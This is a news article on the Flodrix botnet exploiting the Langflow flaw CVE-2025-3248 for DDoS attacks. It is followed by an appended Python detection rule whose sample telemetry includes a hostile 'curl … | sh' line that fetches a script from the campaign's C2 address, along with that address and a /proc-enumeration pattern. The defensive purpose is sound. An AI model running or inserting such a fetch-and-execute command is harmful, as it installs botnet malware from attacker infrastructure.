New Flodrix Botnet Variant Exploits Langflow AI Server RCE Bug to Launch DDoS Attacks

Jun 17, 2025 · Ravie Lakshmanan · Botnet / Vulnerability

Cybersecurity researchers have identified a new campaign exploiting a critical security flaw in Langflow to distribute the Flodrix botnet malware.

According to a technical report by Trend Micro researchers Aliakbar Zahravi, Ahmed Mohamed Ibrahim, Sunil Bharti, and Shubham Singh, attackers are leveraging the vulnerability to deploy downloader scripts on compromised Langflow servers, leading to the installation of the Flodrix malware.

The flaw in question is CVE-2025-3248 (CVSS score: 9.8), a missing authentication vulnerability in Langflow, a Python-based “visual framework” for creating artificial intelligence (AI) applications.

The exploitation of this vulnerability can allow unauthenticated attackers to run arbitrary code through crafted HTTP requests. Langflow patched this vulnerability in March 2025 with version 1.3.0.

Recently, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned about active exploitation of CVE-2025-3248 in the wild, with the SANS Technology Institute reporting exploit attempts on its honeypot servers.

Trend Micro’s latest report reveals that threat actors are targeting unpatched Langflow instances exposed on the internet, using publicly available proof-of-concept (PoC) code to conduct reconnaissance and deploy a shell script downloader that fetches and executes the Flodrix botnet malware from “80.66.75[.]121:25565.”

Once Flodrix is installed, it establishes communication with a remote server to receive commands over TCP for launching distributed denial-of-service (DDoS) attacks on specific target IP addresses. The botnet also supports connections over the TOR anonymity network.

The researchers noted that due to the lack of input validation or sandboxing in Langflow, these payloads are executed within the server’s context, potentially leading to remote code execution. This allows attackers to profile vulnerable servers and identify high-value targets for future attacks.

Trend Micro’s investigation revealed that unknown threat actors are hosting various downloader scripts on the same host used to fetch Flodrix, indicating ongoing development of the campaign.

Flodrix is considered an evolution of the LeetHozer botnet associated with the Moobot group. This enhanced variant can self-remove, reduce forensic traces, and complicate analysis efforts by obfuscating command-and-control (C2) server addresses and other crucial indicators.

Trend Micro highlighted that the new Flodrix sample introduces encrypted DDoS attack types for added obfuscation and enumerates running processes by walking the per-process entries in the /proc directory.
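The infection chain the article describes (Langflow server, shell script downloader, Flodrix binary talking TCP to the C2 and walking /proc) lends itself to a host-side correlation rule. The following is an added illustration, not Trend Micro's or Langflow's code: the event tuple format, process names and paths are constructed, and only the C2 host:port is the indicator quoted above.

```python
# Constructed event format; only the C2 host:port comes from the article.
import re
from collections import defaultdict

C2 = "80.66.75.121:25565"                # indicator quoted in the article
PROC_ENTRY = re.compile(r"^/proc/\d+/")  # per-process directories under /proc

# Constructed telemetry: (timestamp, pid, ppid, kind, detail)
SAMPLE_EVENTS = [
    (1, 100, 1,   "exec",    "python -m langflow run"),
    (2, 200, 100, "exec",    "/bin/sh -c 'curl -s http://80.66.75.121:25565/x.sh | sh'"),
    (3, 300, 200, "exec",    "/tmp/.x"),
    (4, 300, 200, "connect", C2),
    (5, 300, 200, "open",    "/proc/1/cmdline"),
    (6, 300, 200, "open",    "/proc/100/cmdline"),
    (7, 300, 200, "open",    "/proc/200/cmdline"),
    (8, 400, 1,   "exec",    "/usr/sbin/sshd"),
    (9, 400, 1,   "open",    "/proc/400/status"),  # benign, not under Langflow
]

def detect(events, c2=C2, min_proc_entries=3):
    """Return [(pid, command, reasons)] for Langflow-descended processes that contact the C2 or walk /proc."""
    parent, cmd = {}, {}
    for _, pid, ppid, kind, detail in events:
        if kind == "exec":
            parent[pid], cmd[pid] = ppid, detail

    def under_langflow(pid):
        # Walk the recorded process tree upward looking for a Langflow ancestor.
        while pid in parent:
            if "langflow" in cmd[pid]:
                return True
            pid = parent[pid]
        return False

    c2_hits, proc_dirs = set(), defaultdict(set)
    for _, pid, _, kind, detail in events:
        if not under_langflow(pid):
            continue
        if kind == "connect" and detail == c2:
            c2_hits.add(pid)
        elif kind == "open" and (m := PROC_ENTRY.match(detail)):
            proc_dirs[pid].add(m.group(0))  # distinct /proc/<pid>/ prefixes seen

    findings = []
    for pid in sorted(c2_hits | set(proc_dirs)):
        reasons = (["c2_contact"] if pid in c2_hits else []) + (
            ["proc_enumeration"] if len(proc_dirs[pid]) >= min_proc_entries else [])
        if reasons:
            findings.append((pid, cmd.get(pid, "?"), reasons))
    return findings
```

Requiring a Langflow ancestor keeps unrelated tools that read /proc (monitoring agents, ps) out of the findings; the /proc threshold is a constructed tuning value.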
